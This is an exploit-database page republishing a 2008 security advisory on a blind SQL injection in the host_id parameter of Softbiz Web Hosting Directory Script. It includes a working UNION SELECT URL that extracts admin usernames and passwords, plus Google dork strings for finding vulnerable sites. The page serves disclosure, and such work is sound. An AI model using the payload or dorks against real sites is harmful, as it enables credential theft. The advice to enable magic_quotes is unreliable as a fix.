header-logo
Suggest Exploit
vendor:
Web Hosting Directory Script
by:
M.Hasran Addahroni
6.4
CVSS
MEDIUM
Blind Sql Injection
89
CWE
Product Name: Web Hosting Directory Script
Affected Version From: unknown
Affected Version To: unknown
Patch Exists: YES
Related CWE: CVE-2008-1790
CPE: a:softbizscripts:web_hosting_directory_script
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

[ECHO_ADV_89$2008] Softbiz Web Host Directory Script (search_result.php host_id) Blind Sql Injection Vulnerability

Input passed to the 'host_id' parameter in search_result.php is not properly verified before being used to sql query. This can be exploited thru the browser and get the username and password from admin in plain text. Successful exploitation requires that 'magic_quotes' is disabled.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \  
 |    __)_ /    \  \//    ~    \/   |   \ 
 |        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
        \/         \/       \/         \/ 

                                        .OR.ID
ECHO_ADV_89$2008

-----------------------------------------------------------------------------------------
[ECHO_ADV_89$2008] Softbiz Web Host Directory Script (search_result.php host_id) Blind Sql Injection Vulnerability
-----------------------------------------------------------------------------------------

Author         : M.Hasran Addahroni
Date           : April, 28 th 2007
Location       : Jakarta, Indonesia
Web            : http://advisories.echo.or.id/adv/adv89-K-159-2008.txt
Critical Lvl   : Medium
Impact	       : System access
Where	       : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application   : Softbiz Web Host Directory Script
version       : unknown
Vendor        : http://www.softbizscripts.com/web-hosting-directory-script.php
Description   :

Web Hosting Directory Script is a highly Advanced PHP script to run your own web Hosting comparison site.
Since companies in web hosting industry offer very high volumes of affiliate commissions (even up to $80 or more per sale),
hence this script has a great potential to generate very heavy revenues for you.
Script is built with focus on making it SIMPLE for webmasters to manage and very convenient for users to select perfect web Hosting.
---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~

Input passed to the "host_id" parameter in search_result.php is not properly verified before being used to sql query. 
This can be exploited thru the browser and get the username and password from admin in plain text.
Successful exploitation requires that "magic_quotes" is off


Poc/Exploit:
~~~~~~~~~

http://www.target.com/hostdirectory/search_result.php?host_id=-1 union select 1,2,concat(sb_id,0x3a,sb_admin_name,0x3a,sb_pwd),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 from sb_host_admin--

Dork:
~~~~
Google    : "inurl:Powered by SoftbizScripts" "Subscribe Newsletter"
altavista : Home Search Plans  Host Reviews  Register  Login Contact Us

Solution:
~~~~~~

- Edit the source code to ensure that input is properly verified.
- Turn on magic_quotes in php.ini
 

Timeline:
~~~~~~~~

- 28 - 04 - 2008 bug found
- 28 - 04 - 2008 advisory released
---------------------------------------------------------------------------

Shoutz:
~~~~
~ ping - my dearest wife, zautha my light of eyes, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v, az01,negative,the_hydra,neng chika, str0ke
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,an0maly,cybertank,fuzk3_k3ndi,super_temon,b120t0,inggar,fachri,adi,rahmat,indra,cyb3rh3b
~ SinChan,h4ntu,cow_1seng,poniman_coy, ketut, rizal, cR4SH3R, kuntua, stev_manado, nofry,k1tk4t,0pt1c
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net
~ special for rgod - good bye mate, thanks for the great works.
---------------------------------------------------------------------------
Contact:
~~~~~

     K-159 || echo|staff || eufrato[at]gmail[dot]com
     Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

# milw0rm.com [2008-04-28]